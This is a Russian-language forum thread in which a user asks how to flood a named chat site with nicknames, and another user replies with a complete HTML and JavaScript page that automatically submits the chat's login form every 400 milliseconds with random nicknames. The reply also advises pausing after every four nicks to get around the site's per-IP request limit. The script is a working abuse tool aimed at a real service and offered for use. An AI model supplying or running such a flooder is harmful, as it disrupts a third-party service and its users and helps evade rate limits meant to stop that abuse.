Помогите сделать флуд в чате!) Пжалуйсто! )

Discussion in 'Песочница' started by Guest, 23 Aug 2002.

  1. Guest

    Guest Guest

    Reputations:
    0
    Люди человеки&#33[​IMG])) Помогите плиз))) Расскажите как сделать флуд из ников в чате http://www.6684.chatcity.ru/ я попытался но не вышло((( Буду надеяться вы поможете)) Заранее спасибо)
     
  2. Dj Skeleton™

    Joined:
    1 Jun 2002
    Messages:
    225
    Likes Received:
    11
    Reputations:
    1
    всё элементарно:

    <HTML>
    <HEAD>
    <TITLE>.::chAT FlooDeR::.</TITLE>
    < script>
    function flood() {
    this.document.chat.mn.value=(Math.floor(Math.random()*1000000))
    this.document.chat.submit()
    }
    setInterval ("flood()", 400)
    </script>

    </HEAD>
    <BODY bgColor=#000066 onload="flood()">


    <form method=get action="http://www.6684.chatcity.ru/kpobatka"  name="chat" target="new">
    <input class="fdown" name="mn" value="nick_there" size=15 maxlength=32>
    <input type=hidden name="rnd" value="1011522582">
    <input class="fdown" type="image" value="Войти">
    <input class="fdown" type=button value="Выход" onClick="top.location='http://www.6684.chatcity.ru/kpobatka?f=101&c=6684'">
    <input type="hidden" name="c" value="6684"><input type="hidden" name="f" value="11">
    </form>

    </BODY></HTML>


    ЗЫ: тока учти, что через каждые четыре ника придётся делать паузу, т.к. там стоит ограничение на количество запросов с одного ip в минуту!